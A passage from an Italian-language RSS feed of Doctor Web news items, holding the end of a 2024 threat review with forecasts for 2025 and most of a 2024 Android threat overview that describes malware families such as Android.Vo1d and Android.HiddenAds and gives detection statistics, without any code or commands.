        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, ha infettato quasi 1.300.000 dispositivi appartenenti a utenti da 197 paesi. Questo trojan collocava i propri componenti nell'area 
        di sistema e su comando dei malintenzionati era in grado di scaricare da internet e installare di nascosto software di terze parti.
    &lt;/p&gt;
    &lt;p&gt;
        Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel 2024 leggete la nostra &lt;a href="https://news.drweb-av.it/show/review/?i=14970&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;panoramica&lt;/a&gt;.
    &lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="future"&gt;
    &lt;h2 class="alignCenter"&gt;Prospettive e probabili tendenze&lt;/h2&gt;
    &lt;p&gt;
        Gli eventi dell'anno passato hanno ancora una volta dimostrato la diversità delle moderne minacce informatiche. 
        I malintenzionati sono interessati sia ai grandi obiettivi — i settori aziendale e governativo — sia agli utenti comuni. 
        Le funzionalità di molti dei programmi malevoli impiegati negli attacchi mirati da noi analizzati suggeriscono che gli autori 
        dei virus sono costantemente alla ricerca di nuove possibilità di migliorare i metodi di conduzione di campagne malevole e 
        sviluppare i propri strumenti. Col tempo le nuove tecniche vengono inevitabilmente trasferite verso minacce più estese. 
        A questo proposito, nel 2025 è possibile la comparsa di un gran numero di trojan che, per l'occultamento dell'attività malevola, 
        sfrutteranno la tecnologia eBPF. Inoltre, possiamo aspettarci anche nuovi attacchi mirati, tra l'altro, quelli con l'utilizzo degli exploit.
    &lt;/p&gt;
    &lt;p&gt;
        Uno dei principali obiettivi dei criminali informatici è l'arricchimento illegale, pertanto, è possibile che l'anno nuovo ci sarà una crescita 
        dell'attività dei trojan bancari e pubblicitari. Oltre a questo, gli utenti possono riscontrare un maggior numero di programmi malevoli aventi 
        funzionalità di spionaggio.  
    &lt;/p&gt;
    &lt;p&gt;
        Allo stesso tempo, verranno presi di mira gli utenti non solo dei computer Windows, ma anche di altri sistemi operativi, quale Linux e macOS. 
        Continuerà anche la diffusione delle minacce mobili. I proprietari di dispostivi Android, in primo luogo, dovrebbero fare attenzione alla 
        comparsa di nuovi software spia, trojan bancari, nonché nuove applicazioni pubblicitarie malevole e indesiderate. Non si possono escludere 
        nuovi tentativi di infezione di televisori, box TV e altre apparecchiature su base Android. Inoltre, è probabile la comparsa di nuove minacce 
        sullo store di app Google Play. 
    &lt;/p&gt;

    &lt;!--AVP_BANNER start--&gt;
  &lt;div class="reviews-banners"&gt;
    &lt;a class="avp" href="https://www.drweb.com/pravda/issues/?lng=en" target="_blank"&gt;
        &lt;div class="avp__box avp__box--img"&gt;
            &lt;picture&gt;
                &lt;source srcset="https://st.drweb.com/static/new-www/review_banners/avp/avp-banner_885.png" media="(min-width: 885px)" /&gt;
                &lt;source srcset="https://st.drweb.com/static/new-www/review_banners/avp/avp-banner_768.png" media="(min-width: 768px)" /&gt;
                &lt;source srcset="https://st.drweb.com/static/new-www/review_banners/avp/avp-banner_480.png" media="(min-width: 480px)" /&gt;
                &lt;img class="avp__img" src="https://st.drweb.com/static/new-www/review_banners/avp/avp-banner_320.png" alt="The Anti-virus Times." /&gt;
            &lt;/picture&gt;
        &lt;/div&gt;
        &lt;div class="avp__box avp__box--content"&gt;
            &lt;div class="avp__box avp__box--text"&gt;
                &lt;h2 class="avp__title"&gt;The Anti-virus Times&lt;/h2&gt;
                &lt;h3 class="avp__subtitle"&gt;Infinite horizons&lt;/h3&gt;
            &lt;/div&gt;
            &lt;div class="avp__box avp__box--btn"&gt;
                &lt;button class="avp__btn"&gt;read&lt;/button&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;!--AVP_BANNER end--&gt;

&lt;/section&gt;

</description></item><item><guid>https://news.drweb-av.it/show/?i=14970&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili per il 2024</title><link>https://news.drweb-av.it/show/?i=14970&amp;lng=it&amp;c=9</link><pubDate>Thu, 30 Jan 2025 00:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;30 gennaio 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;Nel 2024 le minacce Android più diffuse di nuovo sono stati i trojan pubblicitari. Rispetto all'anno precedente, è aumentata l'attività dei software fraudolenti, trojan ransomware, clicker e trojan bancari. Tra questi ultimi, sono diventati più diffusi rispetto al 2023 i trojan bancari più semplici che rubano solo le credenziali di accesso all'online banking e i codici di conferma dagli SMS.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        Tra i programmi indesiderati, sono state le più attive le applicazioni che invitano gli utenti a completare vari compiti per 
        ricompense virtuali le quali quindi presumibilmente sarebbe possibile convertire in denaro reale. I programmi potenzialmente 
        pericolosi più frequentemente rilevati sono state le utility che consentono di avviare applicazioni Android senza installazione. 
        Mentre i software pubblicitari più attivi si sono rivelate versioni specialmente modificate dell'applicazione di messaggistica 
        WhatsApp, nelle funzionalità delle quali è incorporato un codice per il caricamento di link pubblicitari.
    &lt;/p&gt;
    &lt;p&gt;
        Nel corso dell'anno, gli analisti dei virus dell'azienda Doctor Web hanno individuato centinaia di nuove minacce sullo store di app 
        Google Play, le quali in totale sono state scaricate oltre 26.700.000 volte. Tra di esse erano i programmi malevoli, in particolare, 
        un trojan spia, nonché le applicazioni indesiderate e quelle pubblicitarie.
    &lt;/p&gt;
    &lt;p&gt;
        I nostri specialisti hanno rilevato inoltre un nuovo attacco a box TV su base Android — circa 1.300.000 dispositivi sono stati colpiti 
        da un backdoor che infettava l'area di sistema e su comando dei malintenzionati poteva scaricare e installare software di terze parti.
    &lt;/p&gt;
    &lt;p&gt;
        Oltre a questo, gli analisti dei virus Doctor Web hanno notato una crescita della popolarità di una serie di tecniche volte a complicare 
        l'analisi dei programmi malevoli Android e aggirarne il rilevamento dagli antivirus. Includevano varie manipolazioni con il formato di 
        archivi ZIP (il formato ZIP è la base di file APK di applicazioni Android), manipolazioni con il file di configurazione di programmi 
        &lt;span class="string"&gt;AndroidManifest.xml&lt;/span&gt; 
        e altre ancora. Il più delle volte, queste tecniche venivano riscontrate nei trojan bancari.
    &lt;/p&gt;

    &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
        &lt;h4 class="white alignCenter"&gt;TENDENZE DELL'ANNO PASSATO&lt;/h4&gt;
        &lt;ul&gt;
            &lt;li&gt;Programmi malevoli che visualizzano pubblicità rimangono le minacce più diffuse&lt;/li&gt;
            &lt;li&gt;Aumento dell'attività dei trojan bancari&lt;/li&gt;
            &lt;li&gt;
                Cybercriminali sempre più spesso utilizzano i semplici trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 
                che rubano solo i dati per l'accesso ad account di online banking e i codici di conferma da SMS
            &lt;/li&gt;
            &lt;li&gt;
                Malintenzionati sempre più spesso ricorrono alla manipolazione del formato APK e dei componenti 
                strutturali di applicazioni per aggirare il rilevamento e complicare l'analisi dei malware
            &lt;/li&gt;
            &lt;li&gt;Crescita del numero di rilevamenti dei trojan ransomware &lt;a href="https://vms.drweb-av.it/search/?q=Android.Locker&amp;lng=it"&gt;&lt;b&gt;Android.Locker&lt;/b&gt;&lt;/a&gt; e dei trojan clicker &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;Comparsa di numerose nuove minacce sullo store di app Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="events"&gt;
    &lt;h2 class="alignCenter"&gt;Eventi più interessanti del 2024&lt;/h2&gt;
    &lt;p&gt;
        A maggio scorso gli esperti dell'azienda Doctor Web 
        &lt;a href="https://news.drweb.com/show/?i=14860&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;hanno riferito&lt;/a&gt;
        di un trojan clicker, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.414.origin&amp;lng=it"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt;, trovato in un'applicazione per la gestione di sex toys 
        e in un software per il monitoraggio dell'attività fisica. Entrambi i programmi venivano distribuiti attraverso lo 
        store Google Play e in totale sono stati installati più di 1.500.000 volte.
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.414.origin&amp;lng=it"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; aveva un'architettura modulare e tramite i suoi componenti eseguiva compiti specifici. 
        Così, il trojan apriva impercettibilmente siti pubblicitari e compieva varie azioni su di essi. Come esempio, era in grado 
        di scorrere il contenuto di pagine, inserire testo in moduli, disattivare l'audio su pagine web e catturare i loro screenshot 
        per analizzarne il contenuto ed effettuare successivamente clic sulle aree richieste. Inoltre, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.414.origin&amp;lng=it"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; 
        trasmetteva sul server di comando informazioni dettagliate sul dispositivo infetto. Il clicker intenzionalmente non attaccava 
        determinati utenti — non si avviava sui dispositivi su cui era impostata la lingua di interfaccia cinese.
    &lt;/p&gt;

    &lt;div class=" flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_1.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_1.1.png" alt="Android.Click_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_2.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_2.1.png" alt="Android.Click_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Alcune versioni dei programmi Love Spouse e QRunning nascondevano il trojan &lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        A settembre i nostri specialisti hanno rivelato i dettagli 
        &lt;a href="https://news.drweb-av.it/show/?i=14900&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;dell'analisi&lt;/a&gt;
        dei casi di infezione di box TV su base Android da un backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;. 
        Questo programma malevolo modulare è entrato su quasi 1.300.000 dispositivi di utenti da 197 paesi. Collocava i propri 
        componenti nell'area di sistema ed era in grado su comando dei malintenzionati di scaricare e installare di nascosto 
        software di terze parti.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/02_Android.Vo1d_map_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/02_Android.Vo1d_map_en.png" alt="Android.Void_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Paesi con il maggior numero di box TV infetti dal backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; rilevati&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        A novembre i nostri analisti dei virus, sull'esempio di un trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp.1669&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;, 
        &lt;a href="https://news.drweb-av.it/show/?i=14935&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;hanno raccontato&lt;/a&gt;
        come i malintenzionati utilizzano il protocollo DNS per la connessione nascosta dei malware ai server di comando e controllo. 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp.1669&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; è un trojan piuttosto primitivo il cui compito si limita a caricare i siti impostati. 
        Dalla maggioranza delle minacce simili, esso si differenzia per quello che ottiene l'indirizzo dei siti di destinazione dal record 
        TXT del server DNS malevolo, per cui utilizza codice modificato della libreria open source dnsjava. Con tutto ciò, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp.1669&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; si manifesta solo in caso di connessione a internet tramite determinati provider — negli altri casi funziona come software innocuo.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/03_Android.FakeApp.1669_c2_response.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/03_Android.FakeApp.1669_c2_response.png" alt="DNS_Trojan_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Esempio di record TXT di dominio preimpostato che il server DNS ha fornito in risposta a una richiesta tramite l'utility Linux dig durante l'analisi di una delle varianti di &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp.1669&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h2 class="alignCenter"&gt;Statistiche&lt;/h2&gt;
    &lt;p&gt;
        Secondo i dati delle statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel 2024 le minacce più diffuse sono 
        diventati i programmi malevoli, che hanno rappresentato il 74,67% di tutti i casi di rilevamento. Seguono le applicazioni pubblicitarie 
        con il 10,96%. La terza posizione è occupata dai programmi potenzialmente pericolosi con un indicatore del 10,55%. I quarti per diffusione 
        sono stati i programmi indesiderati — gli utenti li riscontravano nel 3,82% dei casi.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/04_threat_share_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/04_threat_share_2024_en.png" alt="Android_Danger_Stat_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    
    &lt;h3&gt;Applicazioni malevole&lt;/h3&gt;
    &lt;p&gt;
        I programmi malevoli per Android più diffusi di nuovo sono stati i trojan pubblicitari della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.
        Nell'anno passato, la loro quota sul totale delle applicazioni malevole rilevate dall'antivirus Dr.Web è aumentata di 0,34 pp. ammontando al 31,95% dei rilevamenti.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/05_Android.HiddenAds_dynamics_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/05_Android.HiddenAds_dynamics_2024_en.png" alt="Android.Hidden.Ads_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Tra i campioni di questa famiglia, il più attivo è stato &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;
        (il 15,10% dei rilevamenti della famiglia e il 4,84% del numero totale rilevamenti malware). Questa è una delle tante varianti del programma malevolo
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt;, che gli utenti riscontrano ormai da diversi anni. La versione
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt; insieme ad altre varianti è comparsa nel 2023 e secondo le nostre
        &lt;a href="https://news.drweb-av.it/show/review/?i=14846&amp;lng=it#stat" target="_blank" rel="noopener noreferrer"&gt;previsioni&lt;/a&gt;
        poteva salire alla posizione leader nella famiglia, il che, infine, è successo. Nel 2024 anche risultano diffuse le nuove varianti
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3980&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3989&lt;/b&gt;, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt; e una serie di altre.
    &lt;/p&gt;
    &lt;p&gt;
        È diventata notevole anche la sottofamiglia di trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;. 
        A differenza della maggior parte degli altri programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, i campioni di questo gruppo possiedono la capacità di avvio automatico e alcune altre
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;particolarità&lt;/a&gt;. 
        Il più frequentemente sui dispositivi protetti dall'antivirus Dr.Web venivano rilevate le varianti &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4.origin&lt;/b&gt;, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;.
    &lt;/p&gt;
    &lt;p&gt;
        I secondi malware più diffusi sono stati i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, 
        che i malintenzionati utilizzano nella realizzazione di vari schemi fraudolenti. Lo scorso anno essi hanno rappresentato il 18,28% di tutti i 
        rilevamenti malware, il che è di 16,45 pp. in più rispetto all'anno precedente. Il più delle volte, tali trojan caricano siti indesiderati progettati 
        per attacchi di phishing e frodi online.
    &lt;/p&gt;
    &lt;p&gt;
        Alla terza posizione con una quota dell'11,52% (scesi di 16,7 pp. rispetto al 2023) si trovano i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy&amp;lng=it"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt;, 
        che possiedono ampie funzionalità di spionaggio. Come un anno prima, il campione più diffuso della famiglia è diventato
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.5106&amp;lng=it"&gt;&lt;b&gt;Android.Spy.5106&lt;/b&gt;&lt;/a&gt; — ha rappresentato il 5,95% dei rilevamenti programmi malevoli.
    &lt;/p&gt;
    &lt;p&gt;
        Nel 2024 si osservava una tendenza multidirezionale nella diffusione dei software malevoli progettati per il download e l'installazione di 
        altri programmi e capaci di eseguire codice arbitrario. Così, rispetto all'anno prima, la quota dei downloader &lt;a href="https://vms.drweb-av.it/search/?q=Android.DownLoader&amp;lng=it"&gt;&lt;b&gt;Android.DownLoader&lt;/b&gt;&lt;/a&gt; 
        è diminuita di 0,49 pp. scendendo all'1,69%, quella dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Mobifun&amp;lng=it"&gt;&lt;b&gt;Android.Mobifun&lt;/b&gt;&lt;/a&gt; è scesa di 0,15 pp. allo 0,10%, e quella dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Xiny&amp;lng=it"&gt;&lt;b&gt;Android.Xiny&lt;/b&gt;&lt;/a&gt; 
        di 0,14 pp. allo 0,13%. Allo stesso tempo, venivano rilevati più spesso i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; (il 2,74% dei casi, una crescita di 0,6 pp.) e 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.RemoteCode&amp;lng=it"&gt;&lt;b&gt;Android.RemoteCode&lt;/b&gt;&lt;/a&gt; (il 3,78% dei casi, una crescita di 0,95 pp.).
    &lt;/p&gt;
    &lt;p&gt;
        La quota delle applicazioni malevole protette dai software packer &lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt; è scesa dal 7,98% al 5,49%, praticamente tornando al livello del 2022. 
        Anche dal 10,06% al 5,38% si è ridotto il numero di attacchi tramite i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;. 
        Allo stesso tempo, è leggermente aumentato il numero di rilevamenti dei trojan ransomware &lt;a href="https://vms.drweb-av.it/search/?q=Android.Locker&amp;lng=it"&gt;&lt;b&gt;Android.Locker&lt;/b&gt;&lt;/a&gt; 
        (dall'1,15% all'1,60%) e dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt; (dallo 0,57% allo 0,81%). Questi ultimi consentono di utilizzare i dispositivi Android infetti per 
        reindirizzare attraverso di essi il traffico di rete dei malintenzionati. Inoltre, è cresciuta considerevolmente l'attività dei programmi malevoli 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;, capaci di aprire siti pubblicitari ed eseguire clic su pagine web (saliti dallo 0,82% al 3,56%).
    &lt;/p&gt;
    &lt;p&gt;Le dieci applicazioni malevole più frequentemente rilevate nel 2024 sono:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/06_top_malware_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/06_top_malware_2024_en.png" alt="Most_Common_Malware_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.5106&amp;lng=it"&gt;&lt;b&gt;Android.Spy.5106&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di una delle varianti di un programma trojan che rappresenta versioni alterate di mods non ufficiali dell'applicazione WhatsApp. È in grado di rubare il contenuto di notifiche, offrire l'installazione di programmi da fonti sconosciute, e durante l'utilizzo del programma di messaggistica, visualizzare finestre di dialogo con contenuto configurabile da remoto.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3851&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programmi trojan per la visualizzazione di pubblicità invadenti. I campioni di questa famiglia spesso vengono distribuiti sotto le apparenze di applicazioni innocue e in alcuni casi vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza sul sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.1751&amp;lng=it"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Trojan che viene incorporato in mods dell'applicazione di messaggistica istantanea WhatsApp e si maschera da classi delle librerie di Google. Nel corso dell'utilizzo dell'applicazione vettore, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.1751&amp;lng=it"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt; effettua richieste a uno dei server di comando e controllo. In risposta, il trojan riceve due link, uno dei quali è destinato agli utenti di lingua russa, e il secondo a tutti gli altri utenti. Quindi visualizza una finestra di dialogo con il contenuto ricevuto dal server, e dopo che l'utente fa clic sul pulsante di conferma, carica il link corrispondente nel browser.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma trojan che cela la propria presenza su dispositivi Android e visualizza annunci invadenti. Appartiene a una sottofamiglia che differisce dagli altri campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; per una serie di caratteristiche. Ad esempio, tali trojan sono in grado di avviarsi in autonomo dopo l'installazione. Inoltre, in essi è realizzato un meccanismo che consente ai loro servizi di rimanere costantemente in esecuzione. In una serie di casi, in essi possono essere impiegate anche le funzionalità nascoste del sistema operativo Android.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7815&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma trojan che visualizza annunci pubblicitari invadenti. È un modulo software che gli sviluppatori software incorporano nelle applicazioni.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;Software indesiderati&lt;/h3&gt;
    &lt;p&gt;
